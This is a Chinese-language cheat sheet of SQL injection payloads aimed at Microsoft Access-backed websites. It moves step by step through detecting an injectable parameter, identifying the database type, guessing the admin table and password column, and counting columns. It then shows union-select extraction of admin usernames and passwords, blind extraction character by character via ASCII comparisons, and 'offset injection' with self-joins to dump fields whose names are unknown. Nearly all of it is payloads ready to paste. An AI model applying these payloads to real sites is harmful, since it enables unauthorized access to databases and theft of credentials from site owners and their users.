Access注入

1. 判断是否存在注入

---

 '  

and 1=1

and 1=2

or 1=2

or 1=2

' and '1'='1

' and '1'='2

---

2.判断数据库类型

---

and exists (select * from msysobjects) > 0        //判断access

and exists (select * from sysobjects) > 0            //判断sqlserver

---

3.判断数据库表

---

and exists (select * from admin)                  //判断是否有admin表

4.判断字段名称

and exists (select password from admin)            //判断admin表中是否有password字段

5.判断字段长度

order by 10            //判断字段长度为10

6.使用联合查询获取想要的值

and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin               

7.获取具体字段值

and 1=2 union select 1,2,admin,4,password,6,7,8,9,10 from admin    

---

其他查询语句：

1.判断admin字段的长度

and (select len(admin) from admin) = 5

and (select len(admin) from admin) > 5

2.判断password字段的长度

and (select len(password) from admin) = 5

3.判断admin字段的第一个字符的ASCII值

and (select top 1 asc(mid(admin,1,1)) from admin) > 100

4.判断admin字段的第二字符的ASCII值

and (select top 1 asc(mid(admin,2,1)) from admin) > 100

5.判断admin字段的第三个字符的ASCII值

and (select top 1 asc(mid(admin,3,1)) from admin) > 100

---

偏移注入：

主要用于解决能够猜解到表名，而列名猜解不到的情况。

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

1.使用*替换22

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin

2.使用*替换21

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin

3.使用*替换20

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin

4.一次往前替换，直到不报错为止

5.带入公式计算

22-16=6

10+6*2=22

union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

4+6*3=22

union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

将随机爆破出数据库中字段的值。